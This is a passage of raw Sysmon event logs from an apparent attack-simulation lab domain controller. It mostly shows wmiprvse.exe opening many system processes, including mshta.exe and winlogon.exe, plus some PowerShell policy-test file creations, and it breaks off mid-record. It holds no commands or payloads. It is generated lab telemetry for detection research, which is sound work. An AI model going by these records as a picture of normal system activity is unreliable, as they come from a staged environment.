RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nckzut2w.wjy.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fce5htz3.ewc.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-AAAA-00000000AD01}14736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program 